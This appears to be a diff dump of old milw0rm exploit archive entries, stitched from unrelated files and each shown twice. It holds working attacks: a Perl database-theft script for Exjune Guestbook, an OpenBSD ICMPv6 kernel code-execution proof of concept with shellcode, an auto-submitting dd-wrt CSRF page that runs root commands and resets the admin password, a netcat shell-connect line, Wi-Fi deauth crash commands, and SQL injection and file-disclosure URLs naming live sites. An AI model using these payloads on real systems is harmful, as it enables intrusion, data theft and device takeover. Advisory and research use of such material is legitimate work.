@~~=Script :SkyPortal Downloads Manager v1.1
@~~=S.Site :http://skyportal.net
@~~=Download :http://skyportal.net/downloads/modules/mod_downloads_1_1.zip
@~~=Demo :http://vegtrafikk.net
@~~=======================================~~@
@~~=Vul:
@~~=http://site.com/ [PATH] /admin_dl_browse.asp
@~~=http://site.com/ [PATH] /dl_add_form.asp
@~~=Demo:
@~~=http://vegtrafikk.net/admin_dl_browse.asp
@~~=http://resala2u.com/admin_dl_browse.asp
vs.. vs.. vs..
@~~=======================================~~@
@~~=Greetz For
@~~=Str0ke & Kralman & Mrabah12R & K3vin Mitnick & web-terrorist & Silent & SpotGang
@~~=======================================~~@
Derdimi dinledim, derdimden iGRENDiM...
Onun derdini gordum, derdime iMRENDiM...
FilistiN
@~~=======================================~~@
# milw0rm.com [2009-02-27]

View file

@ -1,56 +1,56 @@
#!/usr/bin/perl
# By AlpHaNiX [NullArea.Net]
# alpha[at]hacker.bz
# Made in Tunisia
###########
# script : Exjune Guestbook v2
# download : http://www.exjune.com/downloads/downloads/exJune_guestbook.asp
###########
# Vulnerable :
# database path : /admin/exdb.mdb
##########
# Real Life Example :
#
#
# OOO OOO OO OO OO
# OO O O O O
# O O O OO OO O O O O OO OOO OOOO OOOOO
# O O O O O O O OOO OO OOOOOO O
# O OO O O O O O O O O OOOOOO
# OOO OO OOOOO OOOOO OOOOO OOO OOO OOOOO OOOOO OOOO OO
#
#
#[-] Exjune Guestbook v2 Remote Database Disclosure Exploit
#[-] Found & Exploited By AlpHaNiX
#
#
#[!] Exploiting http://www.ladyslipperretreat.com/guestbook// ....
#[+] http://www.ladyslipperretreat.com/guestbook// Exploited ! Database saved to c:/db.mdb
##########
# Greetz for Zigma/Djek/unary/r1z
use lwp::UserAgent;
system('cls');
system('title Exjune Guestbook v2 Remote Database Disclosure Exploit');
system('color 2');
if (!defined($ARGV[0])) {print "[!] Usage : \n ./exploit http://site.com\n";exit();}
if ($ARGV[0] =~ /http:\/\// ) { $site = $ARGV[0]."/"; } else { $site = "http://".$ARGV[0]."/"; }
print "\n\n\n\n OOO OOO OO OO OO\n" ;
print " OO O O O O\n" ;
print " O O O OO OO O O O O OO OOO OOOO OOOOO\n" ;
print " O O O O O O O OOO OO OOOOOO O\n" ;
print " O OO O O O O O O O O OOOOOO\n" ;
print " OOO OO OOOOO OOOOO OOOOO OOO OOO OOOOO OOOOO OOOO OO\n" ;
print "\n\n[-] Exjune Guestbook v2 Remote Database Disclosure Exploit\n";
print "[-] Found & Exploited By AlpHaNiX \n\n\n";
print "[!] Exploiting $site ....\n";
my $site = $ARGV[0] ;
my $target = $site."/admin/exdb.mdb" ;
my $useragent = LWP::UserAgent->new();
my $request = $useragent->get($target,":content_file" => "c:/db.mdb");
if ($request->is_success) {print "[+] $site Exploited ! Database saved to c:/db.mdb";exit();}
else {print "[!] Exploiting $site Failed !\n[!] ".$request->status_line."\n";exit();}
# milw0rm.com [2009-04-09]
#!/usr/bin/perl
# By AlpHaNiX [NullArea.Net]
# alpha[at]hacker.bz
# Made in Tunisia
###########
# script : Exjune Guestbook v2
# download : http://www.exjune.com/downloads/downloads/exJune_guestbook.asp
###########
# Vulnerable :
# database path : /admin/exdb.mdb
##########
# Real Life Example :
#
#
# OOO OOO OO OO OO
# OO O O O O
# O O O OO OO O O O O OO OOO OOOO OOOOO
# O O O O O O O OOO OO OOOOOO O
# O OO O O O O O O O O OOOOOO
# OOO OO OOOOO OOOOO OOOOO OOO OOO OOOOO OOOOO OOOO OO
#
#
#[-] Exjune Guestbook v2 Remote Database Disclosure Exploit
#[-] Found & Exploited By AlpHaNiX
#
#
#[!] Exploiting http://www.ladyslipperretreat.com/guestbook// ....
#[+] http://www.ladyslipperretreat.com/guestbook// Exploited ! Database saved to c:/db.mdb
##########
# Greetz for Zigma/Djek/unary/r1z
use lwp::UserAgent;
system('cls');
system('title Exjune Guestbook v2 Remote Database Disclosure Exploit');
system('color 2');
if (!defined($ARGV[0])) {print "[!] Usage : \n ./exploit http://site.com\n";exit();}
if ($ARGV[0] =~ /http:\/\// ) { $site = $ARGV[0]."/"; } else { $site = "http://".$ARGV[0]."/"; }
print "\n\n\n\n OOO OOO OO OO OO\n" ;
print " OO O O O O\n" ;
print " O O O OO OO O O O O OO OOO OOOO OOOOO\n" ;
print " O O O O O O O OOO OO OOOOOO O\n" ;
print " O OO O O O O O O O O OOOOOO\n" ;
print " OOO OO OOOOO OOOOO OOOOO OOO OOO OOOOO OOOOO OOOO OO\n" ;
print "\n\n[-] Exjune Guestbook v2 Remote Database Disclosure Exploit\n";
print "[-] Found & Exploited By AlpHaNiX \n\n\n";
print "[!] Exploiting $site ....\n";
my $site = $ARGV[0] ;
my $target = $site."/admin/exdb.mdb" ;
my $useragent = LWP::UserAgent->new();
my $request = $useragent->get($target,":content_file" => "c:/db.mdb");
if ($request->is_success) {print "[+] $site Exploited ! Database saved to c:/db.mdb";exit();}
else {print "[!] Exploiting $site Failed !\n[!] ".$request->status_line."\n";exit();}
# milw0rm.com [2009-04-09]

View file

@ -1,166 +1,166 @@
# The PoC executes the shellcode (int 3) and returns. It overwrites the
# ext_free() function pointer on the mbuf and forces a m_freem() on the
# overflowed packet.
#
# The Impacket library is used to craft and send packets
# (http://oss.coresecurity.com/projects/impacket.html or download from
# Debian repositories)
#
# Currently, only systems supporting raw sockets and the PF_PACKET family
# can run the included proof-of-concept code.
#
# Tested against a system running "OpenBSD 4.0 CURRENT (GENERIC) Mon Oct
# 30"
#
# To use the code to test a custom machine you will need to: 1) Adjust the
# MACADDRESS variable 2) Find the right trampoline value for your system
# and replace it in the code. To find a proper trampoline value use the
# following command: "objdump -d /bsd | grep esi | grep jmp" 3) Adjust the
# ICMP checksum
#
# The exploit should stop on an int 3 and pressing "c" in ddb the kernel
# will continue normally.
#
#
# Description:
# OpenBSD ICMPv6 fragment remote execution PoC
#
# Author:
# Alfredo Ortega
# Mario Vilas
#
# Copyright (c) 2001-2007 CORE Security Technologies, CORE SDI Inc.
# All rights reserved
from impacket import ImpactPacket
import struct
import socket
import time
class BSD_ICMPv6_Remote_BO:
MACADDRESS = (0x00,0x0c,0x29,0x44,0x68,0x6f)
def Run(self):
self.s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW)
self.s.bind(('eth0',0x86dd))
sourceIP = '\xfe\x80\x00\x00\x00\x00\x00\x00\x02\x0f\x29\xff\xfe\x44\x68\x6f' # source address
destIP = '\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01' # destination address Multicast Link-level
firstFragment, secondFragment = self.buildOpenBSDPackets(sourceIP,destIP)
validIcmp = self.buildValidICMPPacket(sourceIP,destIP)
for i in range(100): # fill mbufs
self.sendpacket(firstFragment)
self.sendpacket(validIcmp)
time.sleep(0.01)
for i in range(2): # Number of overflow packets to send. Increase if exploit is not reliable
self.sendpacket(secondFragment)
time.sleep(0.1)
self.sendpacket(firstFragment)
self.sendpacket(validIcmp)
time.sleep(0.1)
def sendpacket(self, data):
ipe = ImpactPacket.Ethernet()
ipe.set_ether_dhost(self.MACADDRESS)
ipd = ImpactPacket.Data(data)
ipd.ethertype = 0x86dd # Ethertype for IPv6
ipe.contains(ipd)
p = ipe.get_packet()
self.s.send(p)
def buildOpenBSDPackets(self,sourceIP,destIP):
HopByHopLenght= 1
IPv6FragmentationHeader = ''
IPv6FragmentationHeader += struct.pack('!B', 0x3a) # next header (00: Hop by Hop)
IPv6FragmentationHeader += struct.pack('!B', 0x00) # reserverd
IPv6FragmentationHeader += struct.pack('!B', 0x00) # offset
IPv6FragmentationHeader += struct.pack('!B', 0x01) # offset + More fragments: yes
IPv6FragmentationHeader += struct.pack('>L', 0x0EADBABE) # id
IPv6HopByHopHeader = ''
IPv6HopByHopHeader += struct.pack('!B', 0x2c) # next header (0x3A: ICMP)
IPv6HopByHopHeader += struct.pack('!B', HopByHopLenght ) # Hdr Ext Len (frutaaaaaaa :D )
IPv6HopByHopHeader += '\x00' *(((HopByHopLenght+1)*8)-2) # Options
longitud = len(IPv6HopByHopHeader)+len(IPv6FragmentationHeader)
print longitud
IPv6Packet = ''
IPv6Packet += struct.pack( '>L', 6 << 28 ) # version, traffic class, flow label
IPv6Packet += struct.pack( '>H', longitud ) # payload length
IPv6Packet += '\x00' # next header (2c: Fragmentation)
IPv6Packet += '\x40' # hop limit
IPv6Packet += sourceIP
IPv6Packet += destIP
firstFragment = IPv6Packet+IPv6HopByHopHeader+IPv6FragmentationHeader+('O'*150)
self.ShellCode = ''
self.ShellCode += '\xcc' # int 3
self.ShellCode += '\x83\xc4\x20\x5b\x5e\x5f\xc9\xc3\xcc' #fix ESP and ret
ICMPv6Packet = ''
ICMPv6Packet += '\x80' # type (128 == Icmp echo request)
ICMPv6Packet += '\x00' # code
ICMPv6Packet += '\xfb\x4e' # checksum
ICMPv6Packet += '\x33\xf6' # ID
ICMPv6Packet += '\x00\x00' # sequence
ICMPv6Packet += ('\x90'*(212-len(self.ShellCode)))+self.ShellCode
# Start of the next mfub (we land here):
ICMPv6Packet += '\x90\x90\x90\x90\xE9\x3B\xFF\xFF' # jump backwards
ICMPv6Packet += '\xFFAAA\x01\x01\x01\x01AAAABBBBAAAABBBB'
# mbuf+0x20:
trampoline = '\x8c\x23\x20\xd0' # jmp ESI on /bsd (find with "objdump -d /bsd | grep esi | grep jmp")
ICMPv6Packet += 'AAAAAAAA'+trampoline+'CCCCDDDDEEEEFFFFGGGG'
longitud = len(ICMPv6Packet)
IPv6Packet = ''
IPv6Packet += struct.pack( '>L', 6 << 28 ) # version, traffic class, flow label
IPv6Packet += struct.pack( '>H', longitud ) # payload length
IPv6Packet += '\x2c' # next header (2c: Fragmentation)
IPv6Packet += '\x40' # hop limit
IPv6Packet += sourceIP
IPv6Packet += destIP
IPv6FragmentationHeader = ''
IPv6FragmentationHeader += struct.pack('!B', 0x3a) # next header (3A: icmpV6)
IPv6FragmentationHeader += struct.pack('!B', 0x00) # reserverd
IPv6FragmentationHeader += struct.pack('!B', 0x00) # offset
IPv6FragmentationHeader += struct.pack('!B', 0x00) # offset + More fragments:no
IPv6FragmentationHeader += struct.pack('>L', 0x0EADBABE) # id
secondFragment = IPv6Packet+IPv6FragmentationHeader+ICMPv6Packet
return firstFragment, secondFragment
def buildValidICMPPacket(self,sourceIP,destIP):
ICMPv6Packet = ''
ICMPv6Packet += '\x80' # type (128 == Icmp echo request)
ICMPv6Packet += '\x00' # code
ICMPv6Packet += '\xcb\xc4' # checksum
ICMPv6Packet += '\x33\xf6' # ID
ICMPv6Packet += '\x00\x00' # sequence
ICMPv6Packet += 'T'*1232
longitud = len(ICMPv6Packet)
IPv6Packet = ''
IPv6Packet += struct.pack( '>L', 6 << 28 ) # version, traffic class, flow label
IPv6Packet += struct.pack( '>H', longitud ) # payload length
IPv6Packet += '\x3A' # next header (2c: Fragmentation)
IPv6Packet += '\x40' # hop limit
IPv6Packet += sourceIP
IPv6Packet += destIP
icmpPacket = IPv6Packet+ICMPv6Packet
return icmpPacket
attack = BSD_ICMPv6_Remote_BO()
attack.Run()
# milw0rm.com [2007-03-15]
# The PoC executes the shellcode (int 3) and returns. It overwrites the
# ext_free() function pointer on the mbuf and forces a m_freem() on the
# overflowed packet.
#
# The Impacket library is used to craft and send packets
# (http://oss.coresecurity.com/projects/impacket.html or download from
# Debian repositories)
#
# Currently, only systems supporting raw sockets and the PF_PACKET family
# can run the included proof-of-concept code.
#
# Tested against a system running "OpenBSD 4.0 CURRENT (GENERIC) Mon Oct
# 30"
#
# To use the code to test a custom machine you will need to: 1) Adjust the
# MACADDRESS variable 2) Find the right trampoline value for your system
# and replace it in the code. To find a proper trampoline value use the
# following command: "objdump -d /bsd | grep esi | grep jmp" 3) Adjust the
# ICMP checksum
#
# The exploit should stop on an int 3 and pressing "c" in ddb the kernel
# will continue normally.
#
#
# Description:
# OpenBSD ICMPv6 fragment remote execution PoC
#
# Author:
# Alfredo Ortega
# Mario Vilas
#
# Copyright (c) 2001-2007 CORE Security Technologies, CORE SDI Inc.
# All rights reserved
from impacket import ImpactPacket
import struct
import socket
import time
class BSD_ICMPv6_Remote_BO:
MACADDRESS = (0x00,0x0c,0x29,0x44,0x68,0x6f)
def Run(self):
self.s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW)
self.s.bind(('eth0',0x86dd))
sourceIP = '\xfe\x80\x00\x00\x00\x00\x00\x00\x02\x0f\x29\xff\xfe\x44\x68\x6f' # source address
destIP = '\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01' # destination address Multicast Link-level
firstFragment, secondFragment = self.buildOpenBSDPackets(sourceIP,destIP)
validIcmp = self.buildValidICMPPacket(sourceIP,destIP)
for i in range(100): # fill mbufs
self.sendpacket(firstFragment)
self.sendpacket(validIcmp)
time.sleep(0.01)
for i in range(2): # Number of overflow packets to send. Increase if exploit is not reliable
self.sendpacket(secondFragment)
time.sleep(0.1)
self.sendpacket(firstFragment)
self.sendpacket(validIcmp)
time.sleep(0.1)
def sendpacket(self, data):
ipe = ImpactPacket.Ethernet()
ipe.set_ether_dhost(self.MACADDRESS)
ipd = ImpactPacket.Data(data)
ipd.ethertype = 0x86dd # Ethertype for IPv6
ipe.contains(ipd)
p = ipe.get_packet()
self.s.send(p)
def buildOpenBSDPackets(self,sourceIP,destIP):
HopByHopLenght= 1
IPv6FragmentationHeader = ''
IPv6FragmentationHeader += struct.pack('!B', 0x3a) # next header (00: Hop by Hop)
IPv6FragmentationHeader += struct.pack('!B', 0x00) # reserverd
IPv6FragmentationHeader += struct.pack('!B', 0x00) # offset
IPv6FragmentationHeader += struct.pack('!B', 0x01) # offset + More fragments: yes
IPv6FragmentationHeader += struct.pack('>L', 0x0EADBABE) # id
IPv6HopByHopHeader = ''
IPv6HopByHopHeader += struct.pack('!B', 0x2c) # next header (0x3A: ICMP)
IPv6HopByHopHeader += struct.pack('!B', HopByHopLenght ) # Hdr Ext Len (frutaaaaaaa :D )
IPv6HopByHopHeader += '\x00' *(((HopByHopLenght+1)*8)-2) # Options
longitud = len(IPv6HopByHopHeader)+len(IPv6FragmentationHeader)
print longitud
IPv6Packet = ''
IPv6Packet += struct.pack( '>L', 6 << 28 ) # version, traffic class, flow label
IPv6Packet += struct.pack( '>H', longitud ) # payload length
IPv6Packet += '\x00' # next header (2c: Fragmentation)
IPv6Packet += '\x40' # hop limit
IPv6Packet += sourceIP
IPv6Packet += destIP
firstFragment = IPv6Packet+IPv6HopByHopHeader+IPv6FragmentationHeader+('O'*150)
self.ShellCode = ''
self.ShellCode += '\xcc' # int 3
self.ShellCode += '\x83\xc4\x20\x5b\x5e\x5f\xc9\xc3\xcc' #fix ESP and ret
ICMPv6Packet = ''
ICMPv6Packet += '\x80' # type (128 == Icmp echo request)
ICMPv6Packet += '\x00' # code
ICMPv6Packet += '\xfb\x4e' # checksum
ICMPv6Packet += '\x33\xf6' # ID
ICMPv6Packet += '\x00\x00' # sequence
ICMPv6Packet += ('\x90'*(212-len(self.ShellCode)))+self.ShellCode
# Start of the next mfub (we land here):
ICMPv6Packet += '\x90\x90\x90\x90\xE9\x3B\xFF\xFF' # jump backwards
ICMPv6Packet += '\xFFAAA\x01\x01\x01\x01AAAABBBBAAAABBBB'
# mbuf+0x20:
trampoline = '\x8c\x23\x20\xd0' # jmp ESI on /bsd (find with "objdump -d /bsd | grep esi | grep jmp")
ICMPv6Packet += 'AAAAAAAA'+trampoline+'CCCCDDDDEEEEFFFFGGGG'
longitud = len(ICMPv6Packet)
IPv6Packet = ''
IPv6Packet += struct.pack( '>L', 6 << 28 ) # version, traffic class, flow label
IPv6Packet += struct.pack( '>H', longitud ) # payload length
IPv6Packet += '\x2c' # next header (2c: Fragmentation)
IPv6Packet += '\x40' # hop limit
IPv6Packet += sourceIP
IPv6Packet += destIP
IPv6FragmentationHeader = ''
IPv6FragmentationHeader += struct.pack('!B', 0x3a) # next header (3A: icmpV6)
IPv6FragmentationHeader += struct.pack('!B', 0x00) # reserverd
IPv6FragmentationHeader += struct.pack('!B', 0x00) # offset
IPv6FragmentationHeader += struct.pack('!B', 0x00) # offset + More fragments:no
IPv6FragmentationHeader += struct.pack('>L', 0x0EADBABE) # id
secondFragment = IPv6Packet+IPv6FragmentationHeader+ICMPv6Packet
return firstFragment, secondFragment
def buildValidICMPPacket(self,sourceIP,destIP):
ICMPv6Packet = ''
ICMPv6Packet += '\x80' # type (128 == Icmp echo request)
ICMPv6Packet += '\x00' # code
ICMPv6Packet += '\xcb\xc4' # checksum
ICMPv6Packet += '\x33\xf6' # ID
ICMPv6Packet += '\x00\x00' # sequence
ICMPv6Packet += 'T'*1232
longitud = len(ICMPv6Packet)
IPv6Packet = ''
IPv6Packet += struct.pack( '>L', 6 << 28 ) # version, traffic class, flow label
IPv6Packet += struct.pack( '>H', longitud ) # payload length
IPv6Packet += '\x3A' # next header (2c: Fragmentation)
IPv6Packet += '\x40' # hop limit
IPv6Packet += sourceIP
IPv6Packet += destIP
icmpPacket = IPv6Packet+ICMPv6Packet
return icmpPacket
attack = BSD_ICMPv6_Remote_BO()
attack.Run()
# milw0rm.com [2007-03-15]

View file

@ -187,6 +187,6 @@ sub sendraw {
} else {
die("can\'t connect... aborting.\n");
}
}
# milw0rm.com [2000-11-15]
}
# milw0rm.com [2000-11-15]

View file

@ -66,6 +66,6 @@ close(SOCKET);
print("\nSleeping 5 seconds - waiting for the shell ...\n\n");
sleep(5); system("nc -w 10 $target 60179"); exit(0);
# milw0rm.com [2000-11-17]
# milw0rm.com [2000-11-17]

View file

@ -62,6 +62,6 @@ while ($ans = <$s>)
if ($flag == 1) { print " $ans"; }
if ($ans =~ /^_N_/) { print " ===[ Executed command $cmd ]===============================\n"; $flag = 1 }
}
# milw0rm.com [2005-04-08]
}
# milw0rm.com [2005-04-08]

View file

@ -82,6 +82,6 @@ while (<$socket>)
print $_;
exit;
}
}
# milw0rm.com [2005-04-08]
}
# milw0rm.com [2005-04-08]

File diff suppressed because it is too large Load diff

View file

@ -1,29 +1,29 @@
Nokia E90 and probably other devices with s60v3 crashes with aireplay
The device should be authorised on an access point
sample: aireplay-ng -0 10 -a 00:74:3B:0C:A0:5A -c 00:2A:29:F3:1F:42 wlan0
My HW:
AP= Acorp w422g
Nokia E90 v 07.40.1.2 Ra-6
For attack realisation is necessary to send DeAuth a package on the attacked
device (to throw out it from an access point), then to continue to send
packages on the device.
the Device is crashed off right after repeated authorisation on an access
point
Vulnerability is fast shown at activity on WLAN
WLAN Settings: auto
I specify a harmful code: ./aireplay-ng -x 1024 -0 230 -a $ap -c $target
$iface
Added: the vulnerable device: Nokia N82
# milw0rm.com [2008-09-14]
Nokia E90 and probably other devices with s60v3 crashes with aireplay
The device should be authorised on an access point
sample: aireplay-ng -0 10 -a 00:74:3B:0C:A0:5A -c 00:2A:29:F3:1F:42 wlan0
My HW:
AP= Acorp w422g
Nokia E90 v 07.40.1.2 Ra-6
For attack realisation is necessary to send DeAuth a package on the attacked
device (to throw out it from an access point), then to continue to send
packages on the device.
the Device is crashed off right after repeated authorisation on an access
point
Vulnerability is fast shown at activity on WLAN
WLAN Settings: auto
I specify a harmful code: ./aireplay-ng -x 1024 -0 230 -a $ap -c $target
$iface
Added: the vulnerable device: Nokia N82
# milw0rm.com [2008-09-14]

View file

@ -1,17 +1,17 @@
LUNOSEC ADVISORY
Synopsis: Denial of Service condition in Netgear's WGR614v9 Wireless Router
Firmware version tested: v1.2.2_14.0.13NA (LATEST)
Firmware version tested: WNR834Bv2 v2.0.8_2.0.8 # GTADarkDude tested
Proof of Concept:
Appending a question mark to the router's internal IP address after
the forward slash. e.g., http://192.168.1.1/? results in a denial of
service condition where the http server dies and the administrative
interface is no longer available until after a device reboot.
found: fabrizio siciliano (staticrez)
# milw0rm.com [2009-02-25]
LUNOSEC ADVISORY
Synopsis: Denial of Service condition in Netgear's WGR614v9 Wireless Router
Firmware version tested: v1.2.2_14.0.13NA (LATEST)
Firmware version tested: WNR834Bv2 v2.0.8_2.0.8 # GTADarkDude tested
Proof of Concept:
Appending a question mark to the router's internal IP address after
the forward slash. e.g., http://192.168.1.1/? results in a denial of
service condition where the http server dies and the administrative
interface is no longer available until after a device reboot.
found: fabrizio siciliano (staticrez)
# milw0rm.com [2009-02-25]

View file

@ -1,93 +1,93 @@
Remote root dd-wrt
--------------------------------------------------------------------------------
Written by Michael Brooks
Special thanks to str0ke
Exploits tested on the newist stable version:
Firmware: DD-WRT v24-sp1 (07/27/08) micro
Product Homepage:
http://dd-wrt.com/
Impact:
1)Remote root command execuiton /bin/sh
2)Change web administration password and enable remote admistration
3)create new Port Forwarding rules to byass NAT.
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=ISO-8859-1">
</head>
Remote root command execution /bin/sh
<form method="post" action="http://192.168.1.1/apply.cgi" id=1>
<input name="submit_button" value="Ping" type="hidden">
<input name="action" value="ApplyTake" type="hidden">
<input name="submit_type" value="start" type="hidden">
<input name="change_action" value="gozila_cgi" type="hidden">
<input name="next_page" value="Diagnostics.asp" type="hidden">
<input name="ping_ip" value="echo owned">
<input name="execute command" type="submit">
</form><br><br>
enable remote administration and change login to root:password
<form method="post" action="http://192.168.1.1/apply.cgi">
<input name="submit_button" value="Management" type="hidden">
<input name="action" value="ApplyTake" type="hidden">
<input name="change_action" value="" type="hidden">
<input name="submit_type" value="" type="hidden">
<input name="commit" value="1" type="hidden">
<input name="PasswdModify" value="0" type="hidden">
<input name="remote_mgt_https" value="" type="hidden">
<input name="http_enable" value="1" type="hidden">
<input name="info_passwd" value="0" type="hidden">
<input name="https_enable" value="" type="hidden">
<input name="http_username" value="root" type="hidden">
<input name="http_passwd" value="password" type="hidden">
<input name="http_passwdConfirm" value="password" type="hidden">
<input name="_http_enable" value="1" type="hidden">
<input name="refresh_time" value="3" type="hidden">
<input name="status_auth" value="1" type="hidden">
<input name="maskmac" value="1" type="hidden">
<input name="remote_management" value="1" type="hidden">
<input name="http_wanport" value="8080" type="hidden">
<input name="remote_mgt_telnet" value="1" type="hidden">
<input name="telnet_wanport" value="23" type="hidden">
<input name="boot_wait" value="on" type="hidden">
<input name="cron_enable" value="1" type="hidden">
<input name="cron_jobs" value="" type="hidden">
<input name="loopback_enable" value="1" type="hidden">
<input name="nas_enable" value="1" type="hidden">
<input name="resetbutton_enable" value="1" type="hidden">
<input name="zebra_enable" value="1" type="hidden">
<input name="ip_conntrack_max" value="512" type="hidden">
<input name="ip_conntrack_tcp_timeouts" value="3600" type="hidden">
<input name="ip_conntrack_udp_timeouts" value="120" type="hidden">
<input name="overclocking" value="200" type="hidden">
<input name="router_style" value="yellow" type="hidden">
<input name="Remote Admin" type="submit">
</form><br><br>
Change Port Forwarding to byass NAT protection.
<form method="post" action="http://192.168.1.1/apply.cgi">
<input name="submit_button" value="Change Port Forwarding" type="submit">
<input name="action" value="ApplyTake" type="hidden">
<input name="change_action" value="" type="hidden">
<input name="submit_type" value="" type="hidden">
<input name="forward_spec" value="13" type="hidden">
<input name="name0" value="Hacked" type="hidden">
<input name="from0" value="4450" type="hidden">
<input name="pro0" value="both" type="hidden">
<input name="ip0" value="192.168.1.100" type="hidden">
<input name="to0" value="445" type="hidden">
<input name="enable0" value="on" type="hidden">
<input name="name1" value="Hacked Again" type="hidden">
<input name="from1" value="22" type="hidden">
<input name="pro1" value="tcp" type="hidden">
<input name="ip1" value="192.168.1.101" type="hidden">
<input name="to1" value="22" type="hidden">
<input name="enable1" value="on" type="hidden">
</form>
</html>
<script>
document.getElementById(1).submit();//remote root command execution!
</script>
# milw0rm.com [2008-12-08]
Remote root dd-wrt
--------------------------------------------------------------------------------
Written by Michael Brooks
Special thanks to str0ke
Exploits tested on the newist stable version:
Firmware: DD-WRT v24-sp1 (07/27/08) micro
Product Homepage:
http://dd-wrt.com/
Impact:
1)Remote root command execuiton /bin/sh
2)Change web administration password and enable remote admistration
3)create new Port Forwarding rules to byass NAT.
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=ISO-8859-1">
</head>
Remote root command execution /bin/sh
<form method="post" action="http://192.168.1.1/apply.cgi" id=1>
<input name="submit_button" value="Ping" type="hidden">
<input name="action" value="ApplyTake" type="hidden">
<input name="submit_type" value="start" type="hidden">
<input name="change_action" value="gozila_cgi" type="hidden">
<input name="next_page" value="Diagnostics.asp" type="hidden">
<input name="ping_ip" value="echo owned">
<input name="execute command" type="submit">
</form><br><br>
enable remote administration and change login to root:password
<form method="post" action="http://192.168.1.1/apply.cgi">
<input name="submit_button" value="Management" type="hidden">
<input name="action" value="ApplyTake" type="hidden">
<input name="change_action" value="" type="hidden">
<input name="submit_type" value="" type="hidden">
<input name="commit" value="1" type="hidden">
<input name="PasswdModify" value="0" type="hidden">
<input name="remote_mgt_https" value="" type="hidden">
<input name="http_enable" value="1" type="hidden">
<input name="info_passwd" value="0" type="hidden">
<input name="https_enable" value="" type="hidden">
<input name="http_username" value="root" type="hidden">
<input name="http_passwd" value="password" type="hidden">
<input name="http_passwdConfirm" value="password" type="hidden">
<input name="_http_enable" value="1" type="hidden">
<input name="refresh_time" value="3" type="hidden">
<input name="status_auth" value="1" type="hidden">
<input name="maskmac" value="1" type="hidden">
<input name="remote_management" value="1" type="hidden">
<input name="http_wanport" value="8080" type="hidden">
<input name="remote_mgt_telnet" value="1" type="hidden">
<input name="telnet_wanport" value="23" type="hidden">
<input name="boot_wait" value="on" type="hidden">
<input name="cron_enable" value="1" type="hidden">
<input name="cron_jobs" value="" type="hidden">
<input name="loopback_enable" value="1" type="hidden">
<input name="nas_enable" value="1" type="hidden">
<input name="resetbutton_enable" value="1" type="hidden">
<input name="zebra_enable" value="1" type="hidden">
<input name="ip_conntrack_max" value="512" type="hidden">
<input name="ip_conntrack_tcp_timeouts" value="3600" type="hidden">
<input name="ip_conntrack_udp_timeouts" value="120" type="hidden">
<input name="overclocking" value="200" type="hidden">
<input name="router_style" value="yellow" type="hidden">
<input name="Remote Admin" type="submit">
</form><br><br>
Change Port Forwarding to byass NAT protection.
<form method="post" action="http://192.168.1.1/apply.cgi">
<input name="submit_button" value="Change Port Forwarding" type="submit">
<input name="action" value="ApplyTake" type="hidden">
<input name="change_action" value="" type="hidden">
<input name="submit_type" value="" type="hidden">
<input name="forward_spec" value="13" type="hidden">
<input name="name0" value="Hacked" type="hidden">
<input name="from0" value="4450" type="hidden">
<input name="pro0" value="both" type="hidden">
<input name="ip0" value="192.168.1.100" type="hidden">
<input name="to0" value="445" type="hidden">
<input name="enable0" value="on" type="hidden">
<input name="name1" value="Hacked Again" type="hidden">
<input name="from1" value="22" type="hidden">
<input name="pro1" value="tcp" type="hidden">
<input name="ip1" value="192.168.1.101" type="hidden">
<input name="to1" value="22" type="hidden">
<input name="enable1" value="on" type="hidden">
</form>
</html>
<script>
document.getElementById(1).submit();//remote root command execution!
</script>
# milw0rm.com [2008-12-08]

View file

@ -1,68 +1,68 @@
CVE Number: CVE-2008-1094
Vulnerability: SQL Injection
Risk: Medium
Attack vector: From Remote
Vulnerability Discovered: 16th June 2008
Vendor Notified: 16th June 2008
Advisory Released: 15th December 2008
Abstract
Barracuda Networks Spam Firewall is vulnerable to various SQL Injection attacks.
When exploited by an authenticated user, the identified vulnerability can lead to
Denial of Service, Database Information Disclosure, etc.
Description
The index.cgi resource was identified as being susceptible to SQL Injection attacks.
When filtering user accounts in Users->Account View section, the pattern_x parameter
(where x = 0..n) allows inserting arbitrary SQL code once filter_x parameter is set
to search_count_equals value.
/cgi-bin/index.cgi?&user=&password=&et=&auth_type=Local&locale=en_US&realm=&primary_tab=USERS&secondary_tab=per_user_account_view&boolean_0=boolean_and&filter_0=search_count_equals&pattern_0=if(database() like concat(char(99),char(37)),5,0)
An attacker can exploit this vulnerability by injecting arbitrary SQL code to be
executed as part of the SQL query.
Original Advisory:
http://dcsl.ul.ie/advisories/02.htm
Barracuda Networks Technical Alert
http://www.barracudanetworks.com/ns/support/tech_alert.php
Affected Versions
Barracuda Spam Firewall (Firmware v3.5.11.020, Model 600)
Other products/versions might be affected.
Mitigation
Vendor recommends to the following firmware version
Barracuda Spam Firewall (Firmware v3.5.12.001)
Alternatively, please contact Barracuda Networks for technical support.
Credits
Dr. Marian Ventuneac, marian.ventuneac@ul.ie
Data Communication Security Laboratory, Department of Electronic & Computer Engineering, University of Limerick
Disclaimer
Data Communication Security Laboratory releases this information with the vendor acceptance.
DCSL is not responsible for any malicious application of the information presented in this advisory.
# milw0rm.com [2008-12-16]
CVE Number: CVE-2008-1094
Vulnerability: SQL Injection
Risk: Medium
Attack vector: From Remote
Vulnerability Discovered: 16th June 2008
Vendor Notified: 16th June 2008
Advisory Released: 15th December 2008
Abstract
Barracuda Networks Spam Firewall is vulnerable to various SQL Injection attacks.
When exploited by an authenticated user, the identified vulnerability can lead to
Denial of Service, Database Information Disclosure, etc.
Description
The index.cgi resource was identified as being susceptible to SQL Injection attacks.
When filtering user accounts in Users->Account View section, the pattern_x parameter
(where x = 0..n) allows inserting arbitrary SQL code once filter_x parameter is set
to search_count_equals value.
/cgi-bin/index.cgi?&user=&password=&et=&auth_type=Local&locale=en_US&realm=&primary_tab=USERS&secondary_tab=per_user_account_view&boolean_0=boolean_and&filter_0=search_count_equals&pattern_0=if(database() like concat(char(99),char(37)),5,0)
An attacker can exploit this vulnerability by injecting arbitrary SQL code to be
executed as part of the SQL query.
Original Advisory:
http://dcsl.ul.ie/advisories/02.htm
Barracuda Networks Technical Alert
http://www.barracudanetworks.com/ns/support/tech_alert.php
Affected Versions
Barracuda Spam Firewall (Firmware v3.5.11.020, Model 600)
Other products/versions might be affected.
Mitigation
Vendor recommends to the following firmware version
